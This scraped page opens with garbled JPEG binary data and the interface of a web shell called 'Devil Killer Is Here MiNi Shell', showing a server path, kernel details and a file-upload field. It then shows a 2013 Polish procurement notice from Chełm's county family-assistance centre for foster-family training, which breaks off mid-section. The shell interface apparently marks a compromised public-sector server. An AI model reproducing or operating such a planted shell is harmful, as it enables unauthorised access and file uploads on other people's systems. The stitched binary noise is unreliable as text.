JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130409/137716-N-2013.html

<p class="kh_header"><b>Chełm: Zorganizowanie i przeprowadzenie szkolenia dla 42 osób pełniących funkcję rodzin zastępczych wg Programu PRIDE Rodzinna Opieka Zastępcza Adopcja Towarzystwa Nasz Dom w ramach projektu systemowego pn: START współfinansowanego z Programu Operacyjnego Kapitał Ludzki, Priorytet VII: Promocja integracji społecznej, Działanie 7.1: Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie</b><br>
<b>Numer ogłoszenia: 137716 - 2013; data zamieszczenia: 09.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Chełmie , Plac Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 82 562 76 51, faks 82 562 76 51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.chelm.pl (BIP Starostwa Powiatowego w Chełmie)</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia dla 42 osób pełniących funkcję rodzin zastępczych wg Programu PRIDE Rodzinna Opieka Zastępcza Adopcja Towarzystwa Nasz Dom w ramach projektu systemowego pn: START współfinansowanego z Programu Operacyjnego Kapitał Ludzki, Priorytet VII: Promocja integracji społecznej, Działanie 7.1: Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje zorganizowanie i przeprowadzenie szkolenia dla 42 osób pełniących funkcję rodzin zastępczych zamieszkujących na terenie powiatu chełmskiego wg Programu PRIDE Rodzinna Opieka Zastępcza Adopcja Towarzystwa Nasz Dom w terminie: od 1 maja 2013 roku do 30 czerwca 2013 roku i od 1 września 2013 r. do 30 listopada 2013 roku na terenie miasta Chełm w ramach projektu systemowego pn: START współfinansowanego z Programu Operacyjnego Kapitał Ludzki, Priorytet VII: Promocja integracji społecznej, Działanie 7.1: Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.
2. Cel szkolenia:
Celem szkolenia jest wzmocnienie 42 osób pełniących funkcję rodzin zastępczych na terenie powiatu chełmskiego w zakresie umiejętności i kompetencji oraz poprawa jakości pieczy zastępczej  na terenie powiatu chełmskiego, w tym:  
1) 18 osób pełniących funkcję rodziny zastępczej niezawodowej,
2) 8 osób pełniących funkcję rodziny zastępczej zawodowej, 
3) 3 osoby pełniące funkcję rodziny zastępczej zawodowej specjalistycznej (sprawują opiekę i wychowanie nad dziećmi niepełnosprawnymi), 
4) 2 osoby pełniąc funkcję rodziny zastępczej niezawodowej - kandydatów do pełnienia funkcji rodziny zastępczej zawodowej pełniącej funkcję pogotowia rodzinnego, 
5) 11 osób pełniących funkcję rodziny zastępczej spokrewnionej. 
3. Miejsce realizacji szkolenia: miasto Chełm.
4. Uczestnicy szkolenia: 42 osoby pełniące funkcję rodzin zastępczych zamieszkujących teren powiatu chełmskiego.
5.Zakres programowy szkoleń i liczba godzin:
Zakres programowy szkolenia oraz liczba godzin szkolenia winna być zgodne z  rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 9 grudnia 2011 r. w sprawie szkoleń dla kandydatów do sprawowania pieczy zastępczej (Dz. U. Nr 274, poz.1620).
Szkolenie powinno zawierać następujące kategorie kompetencji:
1) Opieka nad dziećmi, zaspokajanie potrzeb bezpieczeństwa, przynależności, rozwoju i stabilności dzieci w rodzinach zastępczych.
2)Zaspakajanie potrzeb rozwojowych oraz kompensacja opóźnień rozwojowych.
3)Wspieranie więzi pomiędzy dziećmi i ich rodzinami naturalnymi.
4)Ułatwianie dzieciom nawiązania bezpiecznych, pozytywnych i trwałych związków na całe życie.
5)Współpraca z innymi osobami stanowiącymi zespół utworzony dla rozwiązania problemu dziecka lub całej rodziny.
 
A.Zakres programowy szkolenia dla 18 osób pełniących funkcję rodziny zastępczej niezawodowej:
1)elementy prawa rodzinnego oraz zagadnienia z zakresu praw dziecka;
2)regulacje prawne w  zakresie wspierania rodziny i systemu pieczy zastępczej, w tym:
a) zagadnienia organizacji opieki nad dzieckiem i możliwości uzyskania wsparcia w wychowaniu dzieci, w szczególności informacje o zadaniach i  kompetencjach organizatora rodzinnej pieczy zastępczej, koordynatora rodzinnej pieczy zastępczej oraz powiatowego centrum pomocy rodzinie w sprawach dotyczących rodzin zastępczych zawodowych, rodzin zastępczych niezawodowych, rodzinnych domów dziecka i placówek opiekuńczo-wychowawczych typu rodzinnego,
b)zasady finansowania rodzin zastępczych zawodowych, rodzin zastępczych niezawodowych, rodzinnych domów dziecka i placówek opiekuńczo-wychowawczych typu rodzinnego;
3)wiedzę na temat specyfiki pieczy zastępczej, jej celu i czasowego charakteru;
4)wybrane elementy pedagogiki, psychologii rozwojowej i wychowawczej, z uwzględnieniem:
a)problemów dotyczących rozwoju dziecka wychowywanego poza rodziną naturalną,
b)wpływu sytuacji kryzysowych na dziecko i  rodzinę,
c)wiedzy na temat więzi, ich budowania i znaczenia w życiu dziecka,
d)występowania przemocy w rodzinie, 
e)efektywnej komunikacji z dzieckiem oraz innymi uczestnikami procesu pieczy zastępczej, z uwzględnieniem rodziców biologicznych dziecka,
f)potrzeb edukacyjnych dzieci i sposobów wspierania dzieci w kompensowaniu opóźnień edukacyjnych i rozwijaniu zainteresowań;
5)podstawy wiedzy o rozwoju fizjologicznym i zdrowiu dziecka, profilaktyce prozdrowotnej, objawach sygnalizujących choroby i postępowaniu w takich przypadkach; 
6)wiedzę o wpływie środowiska, w którym dziecko się wychowuje, na jego rozwój i zachowanie; 
7)wiedzę i umiejętności rozpoznawania indywidualnych potrzeb dziecka oraz oceny sytuacji dziecka;
8)wiedzę z zakresu organizacji pobytu dziecka w rodzinie zastępczej, rodzinnym domu dziecka lub placówce opiekuńczo-wychowawczej typu rodzinnego;
9) organizowanie wspomagania rozwoju dziecka z  problemami emocjonalnymi i  zaburzeniami zachowania;
10)podstawową wiedzę o uzależnieniach i ich wpływie na dziecko i rodzinę, a także o rozpoznawaniu objawów występowania u dziecka uzależnień;
11)wiedzę o  znaczeniu rodziny biologicznej w  życiu dziecka oraz wskazówki do udziału rodziny zastępczej w planie pracy z rodziną biologiczną, prowadzonej przez asystenta rodziny i koordynatora rodzinnej pieczy zastępczej, ze szczególnym uwzględnieniem kontaktów bezpośrednich i  pośrednich z  rodziną biologiczną oraz działań ukierunkowanych na reintegrację rodziny biologicznej lub zapewnienie dziecku trwałego środowiska rodzinnego;
12)wiedzę na temat wpływu pieczy zastępczej na środowisko rodziny zastępczej ze szczególnym uwzględnieniem potrzeb dzieci naturalnych kandydatów do pełnienia funkcji rodziny zastępczej, prowadzenia rodzinnego domu dziecka; 
13)badania pedagogiczno-psychologiczne.
Liczba godzin szkolenia przeznaczona zakres programowy określony w pkt A, wynosi: 52 godzin dydaktycznych dla każdej osoby, w tym 2 godziny dydaktyczne przeznaczone na przeprowadzenie badań pedagogiczno-psychologicznych dla każdej osoby.
B.Zakres programowy szkolenia dla 8 osób - pełniących funkcję rodziny zastępczej zawodowej obejmuje zakres określony w pkt A, oraz dodatkowo:
1)specyfikę funkcjonowania rodzin zastępczych zawodowych;
2)wiedzę o metodach postępowania z dzieckiem przejawiającym zaburzenia zachowania i  trudności w funkcjonowaniu społecznym;
3)doskonalenie umiejętności opiekuńczych, umiejętności radzenia sobie z trudnościami wychowawczymi oraz pokonywania trudności związanych z kompensacją opóźnień rozwojowych dziecka;
4)wiedzę o metodach i technikach stosowanych w pokonywaniu przez dziecko niepowodzeń szkolnych;
5)metody przeciwdziałania wypaleniu zawodowemu;
6)badania pedagogiczno-psychologiczne.
Liczba godzin szkolenia, przeznaczona na dodatkowy zakres programowy, o którym mowa w pkt B, wynosi 17 godzin dydaktycznych dla każdej osoby, w tym 2 godziny dydaktyczne przeznaczone na przeprowadzenie badań pedagogiczno-psychologicznych dla każdej osoby.
C.Zakres programowy szkolenia dla 3 osób - pełniących funkcję rodziny zastępczej zawodowej specjalistycznej, które sprawują opiekę i wychowanie nad dziećmi niepełnosprawnymi, obejmuje zakres określony w pkt A i B, oraz dodatkowo:
1)wiedzę z  zakresu wczesnej diagnostyki, w  tym wczesnego rozpoznawania zaburzeń rozwojowych, interwencji i  wspomagania rozwoju dziecka, jako kompleksowej wielospecjalistycznej pomocy dziecku niepełnosprawnemu;
2)wiedzę z zakresu rozwoju dziecka, w tym rozwoju psychoruchowego, emocjonalnego i społecznego oraz metod rewalidacji i rehabilitacji dziecka niepełnosprawnego;
3)informacje o organizacjach i instytucjach wspierających oraz udzielających specjalistycznej pomocy rodzinom wychowującym dzieci z różnego rodzaju dysfunkcjami;
4)wiedzę z  zakresu specjalnych potrzeb dzieci niepełnosprawnych;
5)badania pedagogiczno-psychologiczne;
Liczba godzin szkolenia, przeznaczona na dodatkowy zakres programowy, o którym mowa w pkt C wynosi 22 godzin dydaktycznych dla każdej osoby, w tym 2 godziny dydaktyczne przeznaczone na przeprowadzenie badań pedagogiczno-psychologicznych dla każdej osoby.
D.Zakres programowy szkolenia dla 2 osób - kandydatów do pełnienia funkcji rodziny zastępczej zawodowej pełniącej funkcję pogotowia rodzinnego zakres programowy szkolenia, obejmuje zakres określony w  pkt A, B i  C, oraz dodatkowo zagadnienia dotyczące adaptacji psychospołecznej do nowej sytuacji,  także sposobu przygotowania dziecka i rodziny zastępczej do krótkiego pobytu dziecka w tej rodzinie.
Liczba godzin szkolenia, przeznaczona na dodatkowy zakres programowy, o którym mowa w pkt D, wynosi 12 godzin dydaktycznych dla każdej osoby, w tym 2 godziny dydaktyczne przeznaczone na przeprowadzenie badań pedagogiczno-psychologicznych dla każdej osoby.
E.Zorganizowanie w ramach praktyk, jednodniowego wyjazdu studyjnego dla 31 uczestników szkolenia, w tym: 18 osób pełniących funkcję rodziny zastępczej niezawodowej, 8 osób pełniących funkcję rodziny zastępczej zawodowej, 3 osoby pełniące funkcję rodziny zastępczej zawodowej specjalistycznej, 2 osoby pełniące funkcję rodziny zastępczej niezawodowej - kandydatów do pełnienia funkcji rodziny zastępczej zawodowej pełniącej funkcję pogotowia rodzinnego, w celu zapoznania się z doświadczeniami wychowawczymi rodziny zastępczej zawodowej lub rodzinnego domu dziecka lub wioski dziecięcej z terenu powiatu innego niż powiat chełmski.  
F.Zakres programowy szkolenia dla 11 osób pełniących funkcję rodziny zastępczej spokrewnionej zakres programowy szkolenia obejmuje:
1)elementy prawa rodzinnego oraz zagadnienia z zakresu praw dziecka;
2)regulacje prawne w  zakresie wspierania rodziny i systemu pieczy zastępczej, w tym:
a)zagadnienia organizacji opieki nad dzieckiem i możliwości uzyskania wsparcia w wychowaniu dzieci, w szczególności informacje o zadaniach i  kompetencjach organizatora rodzinnej pieczy zastępczej, koordynatora rodzinnej pieczy zastępczej oraz powiatowego centrum pomocy rodzinie w sprawach dotyczących rodzin zastępczych spokrewnionych,
b)zasady finansowania rodzin zastępczych spokrewnionych;
3)wiedzę na temat specyfiki pieczy zastępczej, jej celu i czasowego charakteru;
4)wybrane elementy pedagogiki, psychologii rozwojowej i wychowawczej, z uwzględnieniem:
a)problemów dotyczących rozwoju dziecka wychowywanego poza rodziną naturalną,
b)wpływu sytuacji kryzysowych na dziecko i  rodzinę,
c)wiedzy na temat więzi, ich budowania i znaczenia w życiu dziecka,
d)występowania przemocy w rodzinie, 
e)efektywnej komunikacji z dzieckiem oraz innymi uczestnikami procesu pieczy zastępczej, z uwzględnieniem rodziców biologicznych dziecka,
f)potrzeb edukacyjnych dzieci i sposobów wspierania dzieci w kompensowaniu opóźnień edukacyjnych i rozwijaniu zainteresowań;
5)podstawy wiedzy o rozwoju fizjologicznym i zdrowiu dziecka, profilaktyce prozdrowotnej, objawach sygnalizujących choroby i postępowaniu w takich przypadkach; 
6)wiedzę o wpływie środowiska, w którym dziecko się wychowuje, na jego rozwój i zachowanie; 
7)wiedzę i umiejętności rozpoznawania indywidualnych potrzeb dziecka oraz oceny sytuacji dziecka;
8)organizowanie wspomagania rozwoju dziecka z  problemami emocjonalnymi i zaburzeniami zachowania;
9)podstawową wiedzę o uzależnieniach i ich wpływie na dziecko i rodzinę, a także o rozpoznawaniu objawów występowania u dziecka uzależnień;
10)wiedzę o  znaczeniu rodziny biologicznej w  życiu dziecka oraz wskazówki do udziału rodziny zastępczej w planie pracy z rodziną biologiczną, prowadzonej przez asystenta rodziny i koordynatora rodzinnej pieczy zastępczej, ze szczególnym uwzględnieniem kontaktów bezpośrednich i  pośrednich z  rodziną biologiczną oraz działań ukierunkowanych na reintegrację rodziny biologicznej lub zapewnienie dziecku trwałego środowiska rodzinnego;
Liczba godzin szkolenia, przeznaczona na wyżej wymieniony zakres programowy wynosi 30 godzin dydaktycznych dla każdej osoby.
Wszystkie szkolenia winny być prowadzone w  formie zapewniającej aktywny udział uczestników, zgodnie ze standardami stosowania Programu PRIDE: Rodzinna Opieka Zastępcza.
6.Zadania Wykonawcy:

1)Zorganizowanie i przeprowadzenie szkolenia dla 42 uczestników projektu według Programu PRIDE Rodzinna Opieka Zastępcza Adopcja Towarzystwa Nasz Dom na terenie miasta Chełm w terminie od 27 kwietnia do 30 czerwca 2013 r. i od 1 września do 30 listopada 2013 r. 
2)Uzyskanie zgody Towarzystwa Nasz Dom na przeprowadzenie szkolenia PRIDE Rodzinna Opieka Zastępcza Adopcja i dołączenie zgody do oferty.
3)Przeprowadzenie szkolenia zgodnie ze standardami Programu PRIDE Rodzinna Opieka Zastępcza Adopcja.
4)Przeprowadzenie badań pedagogicznych i psychologicznych dla 31 uczestników szkolenia, w tym: 18 osób pełniących funkcję rodziny zastępczej niezawodowej, 8 osób pełniących funkcję rodziny zastępczej zawodowej, 3 osób pełniących funkcję rodziny zastępczej zawodowej specjalistycznej, 2 osób pełniących funkcję rodziny zastępczej niezawodowej - kandydatów do pełnienia funkcji rodziny zastępczej zawodowej pełniącej funkcję pogotowia rodzinnego i wydanie opinii psychologiczno-pedagogicznej dla każdego z 31 uczestników szkolenia, których dotyczy przeprowadzenie badań pedagogiczno-psychologicznych.
5)Zapewnienie sali dydaktycznej z wyposażeniem (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart itp.) odpowiadającej liczbie osób biorących udział w szkoleniu
6)Zapewnienie uczestnikom szkolenia bezpiecznych i higienicznych warunków szkolenia.
7)Zapewnienie dla każdego uczestnika szkolenia licencjonowanych materiałów szkoleniowych i dydaktycznych wyprodukowanych przez  Towarzystwo Nasz Dom tj. podręcznika dla opiekunów, Księgi Życia, filmów oraz innych materiałów.
8)Zorganizowania przed rozpoczęciem szkolenia 1 spotkania organizacyjnego w dniu 27 kwietnia 2013 r., ze wszystkimi uczestnikami szkolenia w celach organizacyjnych, m.in. poinformowania uczestników szkolenia o szczegółowym zakresie programowym szkolenia, podziałach na grupy, ustalenia wspólnie z uczestnikami terminów szkoleń, organizacji wyjazdu studyjnego. 
9)Zapewnienie wyżywienia uczestnikom szkolenia w każdy dzień szkolenia (obiad składający się z 2 dań) bez względu na liczbę godzin szkoleniowych w danym dniu.
10)Zapewnienie serwisu kawowego z poczęstunkiem w każdy dzień szkolenia (kawa, herbata, sok, ciastka, owoce, woda gazowana i niegazowana, cukier, śmietanka) podczas szkoleń - w czasie przerw w zajęciach szkoleniowych.
11)Zapewnienie zwrotu kosztów dojazdu na szkolenie (z miejsca zamieszkania uczestnika szkolenia do miejsca realizacji szkolenia i z powrotem), zgodnie z obowiązującymi w tym zakresie przepisami.
12)Opracowanie szczegółowego programu i wstępnego harmonogramu szkolenia określającego miejsce szkolenia - adres i nazwę budynku, w którym odbywać się będzie szkolenie, daty i godziny szkolenia, tematykę i zakres programowy, z podziałem na odpowiednie grupy szkoleniowe. Wykonawca zobowiązany jest do dołączenia do oferty opracowanego programu i wstępnego harmonogramu szkolenia.
13)Zorganizowanie jednodniowego wyjazdu studyjnego dla 31 uczestników szkolenia, w tym: 18 osób pełniących funkcję rodziny zastępczej niezawodowej, 8 osób pełniących funkcję rodziny zastępczej zawodowej, 3 osób pełniących funkcję rodziny zastępczej zawodowej specjalistycznej, 2 osób pełniących funkcję rodziny zastępczej niezawodowej - kandydatów do pełnienia funkcji rodziny zastępczej zawodowej pełniącej funkcję pogotowia rodzinnego, w celu zapoznania się z doświadczeniami wychowawczymi rodziny zastępczej zawodowej lub rodzinnego domu dziecka lub wioski dziecięcej z terenu innego powiatu niż powiat chełmski.  
a)Zapewnienie udziału 2 osób - koordynatorów pieczy zastępczej ze strony Zamawiającego podczas wyjazdu studyjnego;
b)Zapewnienie suchego prowiantu na czas podróży do miejsca wyjazdu i drogi powrotnej dla uczestników wyjazdu (dla każdej osoby, co najmniej: 0,5 1. wody niegazowanej lub soku, 2 kanapki, owoce);
c)Zapewnienie dwudaniowego obiadu dla uczestników wyjazdu studyjnego i koordynatorów pieczy zastępczej ze strony Zamawiającego;
d)Zapewnienia bezpiecznego transportu uczestnikom wyjazdu studyjnego (od miejsca wyjazdu tj. miasta Chełm, do miejsca wizyty studyjnej i z powrotem), a także przejazdu taborem autobusowym sprawnym technicznie, z klimatyzacją, posiadającym ubezpieczenie OC, NNW oraz aktualne badania techniczne, spełniającym wszystkie wymogi bezpieczeństwa zgodnie z przepisami o transporcie drogowym (w tym wymagane prawem zezwolenia i licencje dla firmy przewozowej), obsługiwanym przez kierowców posiadających odpowiednie wymagania do kierowania pojazdami i samochodami służącymi do przewozu osób. Dodatkowo w ramach przejazdu Wykonawca zapewni sprawdzenie w dniu wyjazdu stanu technicznego pojazdu przewożącego uczestników oraz opiekunów oraz kierowcy przez Policję. W sytuacji, gdy autokar przewożący nie uzyska stosownego zaświadczenia Wykonawca musi zapewnić autokar zastępczy o tej samej klasie. W przypadku nie wykonania usługi przewozu zgodnie z powyższymi wymogami, Zamawiający ma prawo skorzystać z usługi przewozu innej firmy, obciążając kosztami przewozu Wykonawcę. Godzina i dokładne miejsce wyjazdu zostanie uzgodnione z Wykonawcą na 3 dni przed planowaną datą wyjazdu.
14)Pokrycie kosztów ubezpieczenia uczestników szkolenia od pierwszego do ostatniego dnia szkolenia (zapewnienie ubezpieczenia od następstw nieszczęśliwych wypadków na czas wyjazdu studyjnego i pobytu na szkoleniu), na kwotę nie mniejszą niż 10 tys. zł na każdą osobę biorącą udział w szkoleniu. Polisa zostanie dostarczona Zamawiającemu najpóźniej w dniu rozpoczęcia szkolenia. W razie wystąpienia wypadku, Wykonawca będzie zobowiązany do sporządzenia protokołu okoliczności i przyczyn wypadku związanego ze szkoleniem w drodze do i z miejsca szkolenia;
15)Zapewnienie, w razie konieczności, opieki medycznej i pielęgniarskiej;
16)Zapewnienie kadry o odpowiednim wykształceniu i doświadczeniu w prowadzeniu szkoleń i warsztatów poświadczonym dokumentami w tym: co najmniej 2 osób posiadających certyfikat ukończenia kursu kwalifikacyjnego dla trenerów Programu PRIDE: Rodzinna Opieka Zastępcza Adopcja wydanego przez Towarzystwo Nasz Dom, co najmniej 1 psychologa i 1 pedagoga posiadających uprawnienia do przeprowadzania odpowiednio badań psychologicznych i badań pedagogicznych.
17)Przeprowadzenia ewaluacji szkolenia - dokonanie oceny szkolenia za pomocą ankiet ewaluacyjnych. Wzór ankiety Wykonawca przedstawi Zamawiającemu do akceptacji nie później, niż 3 dni przed terminem rozpoczęcia szkoleń.
18)Prowadzenia dokumentacji obejmującej: indywidualne listy obecności uczestników szkolenia, dziennik zajęć obejmujący: wymiar godzin i tematy zajęć, rejestr wydanych świadectw potwierdzających ukończenie szkolenia.
19)Wykonawca zobowiązany jest wydać każdemu uczestnikowi po ukończeniu szkolenia świadectwa ukończenia szkolenia PRIDE, zawierające dane zgodnie z wymogami Towarzystwa Nasz Dom i obowiązującymi przepisami prawa w tym zakresie, (1 egz. uczestnikowi i 1 egz. Zamawiającemu). Dokument musi zawierać min. szczegółowy zakres programowy szkolenia oraz liczbę godzin szkolenia. 
20)Wykonawca zobowiązany jest wydać Zamawiającemu (1 egz.) opinię psychologiczno-pedagogiczną dotyczącą każdego z 31 uczestników szkolenia, których dotyczy przeprowadzenie badań pedagogiczno-psychologicznych.
21)Przygotowanie prezentacji multimedialnej z przebiegu szkoleniu oraz raportu poszkoleniowego w wersji papierowej  i elektronicznej. 
22)Dołączenia do oferty wzorów materiałów szkoleniowych, w tym świadectw o ukończeniu szkolenia.
23)Oznakowania  pomieszczeń, w których będą odbywały się zajęcia, materiałów szkoleniowych oraz wszelkich innych dokumentów wymaganych przy realizacji szkolenia, zgodnie z wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki. Plakaty  do oznakowania miejsca realizacji projektu dostarczy Zamawiający w dniu rozpoczęcia szkoleń.
24)Przetwarzania danych osobowych uczestników wyłącznie w zakresie realizacji danego szkolenia, zgodnie z ustawą z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (t. j. z 2002 roku Nr 101 poz. 926 ze zm.).
Wykonawca może powierzyć wykonanie zamówienia Podwykonawcom. Wykonawca wskaże w ofercie część zamówienia, której wykonanie powierzy Podwykonawcom..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ).
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  spełnią ten warunek, jeżeli zostanie on spełniony łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
